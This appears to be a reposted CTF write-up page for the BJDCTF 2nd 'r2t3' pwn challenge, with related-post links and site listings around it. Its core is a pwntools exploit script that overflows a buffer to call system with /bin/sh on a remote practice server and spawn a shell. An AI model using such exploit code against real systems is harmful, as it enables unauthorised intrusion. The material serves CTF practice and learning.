[BJDCTF 2nd]r2t3 - 代码天地

[BJDCTF 2nd]r2t3

其他 2020-06-21 12:04:35 阅读次数: 0

在这里插入图片描述

在这里插入图片描述
exp

from pwn import *

context.log_level = 'debug'
proc_name = './r2t3'
# 
sh = remote('node3.buuoj.cn', 28627)
# sh = process(proc_name)
elf = ELF(proc_name)
system_addr = elf.plt['system']
main_addr = elf.sym['main']
bin_sh_addr = 0x08048760
# n = 0x104
payload = 'a'.encode() * (0x11 + 4) + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr) + 'a'.encode() * (0x104 - 0x21)
sh.sendline(payload)
sh.interactive()

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_43833642/article/details/106680866

[BJDCTF 2nd]r2t3

CTF-Pwn-[BJDCTF 2nd] r2t3

[BJDCTF 2nd]r2t4的wp

[BJDCTF 2nd]duangShell [BJDCTF 2nd]duangShell

BJDCTF 2nd WEB

[BJDCTF 2nd]elementmaster

BJDCTF 2nd writeup

[BJDCTF 2nd]duangShell

CTF-Pwn-[BJDCTF 2nd]r2t4

[BJDCTF 2nd]文件探测

[BJDCTF 2nd]old-hack

BJDCTF 2nd pwn Writeup

[BJDCTF 2nd]fake google

[BJDCTF 2nd]one_gadget

BUUOJ [BJDCTF 2nd]elementmaster

BJDCTF 2nd writeup(二)

BJDCTF 2nd(WEB复现)

[BJDCTF 2nd]Schrödinger

BUUCTF：[BJDCTF 2nd]EasyBaBa

[BJDCTF 2nd]简单注入

[BJDCTF 2nd] old-hack

CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2

buuctf [BJDCTF 2nd]ydsneedgirlfriend2

[BJDCTF 2nd]ydsneedgirlfriend2的wp

buuoj BJDCTF 2nd one_gadget

[BUUOJ记录] [BJDCTF 2nd]fake google

[BJDCTF 2nd]duangShell（反弹shell，swp泄露）

CTF-Pwn-[BJDCTF 2nd]els

CTF-Pwn-[BJDCTF 2nd]diff

CTF-Pwn-[BJDCTF 2nd]rci

今日推荐

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

周排行

rbac——界面、权限

Apache CXF + SpringMVC 整合发布WebService

so插件化

Vue.js实战系列---图标字体制作（svg格式）

PAT乙级 1007 素数对猜想(孪生素数对) (20分) ---（C语言 + 详细注释）

被IRM保护的文档，打开失败

Calendar和Date计算日期差的小问题

win10子系统ubuntu18.4安装docker

利用Wrap Shell Script定位Android Native内存泄漏

MySQL: Transaction (Part I - Basic Concept)

每日归档

更多

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)